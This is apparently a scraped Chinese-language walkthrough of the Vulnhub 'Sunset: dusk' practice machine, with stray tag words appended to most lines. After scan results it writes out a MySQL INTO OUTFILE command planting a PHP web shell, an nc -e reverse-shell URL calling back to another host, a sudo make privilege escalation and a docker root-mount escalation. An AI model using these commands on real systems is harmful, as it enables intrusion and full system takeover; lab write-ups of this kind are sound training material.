Sunset: dusk: Vulnhub Walkthrough

靶機連接:php

https://www.vulnhub.com/entry/sunset-dusk,404/mysql

主機IP掃描:sql

 

IP端口掃描:docker

 

21 端口  pyftpdlib 1.5.5 版本漏洞shell

25 端口  Postfix 帳戶枚舉bash

80 Apache httpd 2.4.38 版本漏洞,目錄枚舉3d

3306 mysql   MySQL 5.5.5-10.3.18-MariaDB-0+deb10u1 版本漏洞,暴力破解server

8080 http    PHP cli server 5.5 版本漏洞,目錄枚舉blog

80 HTTP目錄枚舉,無結果cmd

MySQL爆破結果

 

 

嘗試用MySQL into outfile 寫一句話木馬

select "<?php system($_GET['cmd']); ?>" into outfile '/var/tmp/pentest.php';

 

反向shell

http://10.10.203.20:8080/pentest.php?cmd=nc%20-e%20/bin/bash%2010.10.203.14%201234

 

提權操做

COMMAND='/bin/sh'

sudo -u dusk  make -s --eval=$'x:\n\t-'"$COMMAND"

 

docker run -v /:/hostOS -i -t chrisfosterelli/rootplease

 

OVER!!

相關文章
相關標籤/搜索